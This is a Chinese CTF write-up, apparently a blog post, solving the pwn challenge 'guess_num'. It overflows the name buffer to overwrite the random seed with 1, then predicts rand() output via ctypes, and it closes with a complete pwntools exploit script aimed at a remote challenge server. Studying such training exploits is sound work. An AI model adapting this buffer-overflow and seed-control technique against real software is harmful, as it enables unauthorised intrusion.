guess_num

主函数代码
在这里插入图片描述

这道题的思路是通过v8的输入 覆盖seed的值
进入v8可以看到与seed相差0x20
在这里插入图片描述

此处就可构造payload=‘a’*0x20+p64(1) -------------------------------------------------设置种子数为1
通过控制种子数seed来控制随机数rand 以取得flag

在这里插入图片描述

在调用rand()函数时,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。
对于该题目,我们将随机种子设置为0或1都可,参考文件中的循环来写脚本。

这道题还涉及

libc共享库

在命令行 dll guess_num得到共享库的地址
在这里插入图片描述

也可以用脚本得出

elf = ELF('./guess_num')
libc = elf.libc

因为我们已经改变了源文件的seed
在脚本中添加libc.srand(1)
通过循环这样就会生成相同的随机数使其相等
所以现在就可利用libc共享库中的随机数
根据源文件编写脚本

for i in range(10):
     num = str(libc.rand()%6+1)
     io.recvuntil('number:')
     io.sendline(num)

ctypers

我们使用python标准库中自带的ctypes模块进行python和c的混合编程

exp


#coding=utf-8
from pwn import *
from ctypes import *

io = remote('111.198.29.45',56893)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
io.recvuntil('Your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)

io.interactive()
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值